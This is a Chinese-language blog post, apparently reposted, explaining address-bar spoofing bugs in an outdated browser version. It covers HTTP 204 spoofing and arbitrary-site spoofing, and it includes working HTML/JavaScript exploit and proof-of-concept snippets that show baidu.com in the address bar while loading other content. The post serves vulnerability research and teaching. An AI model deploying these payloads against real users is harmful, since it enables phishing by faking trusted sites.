内容简介:伪造URL地址漏洞,页面欺骗漏洞函数:通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理。
0x00:原理
伪造URL地址漏洞, HTTP204/205 地址栏伪造。
页面欺骗漏洞函数:
通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理。
0x01:漏洞
浏览器版本:v2.1.0.1038 (已停止更新了)
1.HTTP204伪造网站漏洞
204 No Content(无内容)—-该响应码有时候表明请求已经执行成功但不需要做任何响应。204响应码会中断浏览器的页面跳转,浏览器会保持原URL不变,页面内容也维持原状。
window.open() 跳转到HTTP 204之后,会更新地址栏,然后通过 opener 注入
伪造百度,因为成功跳转,需要伪造一个指定无法访问的端口即可。
exp:
<a href="https://www.baidu.com:5555" target="sb" onclick="setTimeout('d()', 1000);">点我</a> <script> function d(){ window.open("javascript:location.href='<title>百度搜索</title>www.yuag.org'", "sb"); } </script>
2.伪造任意网站漏洞
poc:
<html> <head> <title>打开小雨博客</title> <script type="text/javascript"> var wx; function poc() { wx = open("http://www.baidu.com:5555","newwin"); doit(); } function doit() { wx.document.write("<ti"+"tle>yuag</title><iframe src='https://www.yuag.org' width=95% height=95%>"); } poc(); </script>
0x03:视频
https://www.bilibili.com/video/av55777222
0x04:参考
现代浏览器新安全研究.ppt
WEB之困
浏览器地址栏欺骗漏洞挖掘.VSRC.2017.7.29城市沙龙第一站.ppt
现代浏览器地址栏之困.ppt
白帽子讲浏览器安全
Browser UI Security 技术白皮书
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- [浏览器安全漏洞一] dll劫持漏洞
- ES文件浏览器漏洞复现
- ES文件浏览器CVE-2019-6447漏洞分析
- UC 浏览器曝出中间人攻击漏洞
- Edge 浏览器曝高危漏洞,受控电脑可执行任意命令
- SQLite被曝存在漏洞,所有 Chromium 浏览器受影响
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Web Security, Privacy and Commerce, 2nd Edition
Simson Garfinkel / O'Reilly Media / 2002-01-15 / USD 44.95
Since the first edition of this classic reference was published, World Wide Web use has exploded and e-commerce has become a daily part of business and personal life. As Web use has grown, so have ......一起来看看 《Web Security, Privacy and Commerce, 2nd Edition》 这本书的介绍吧!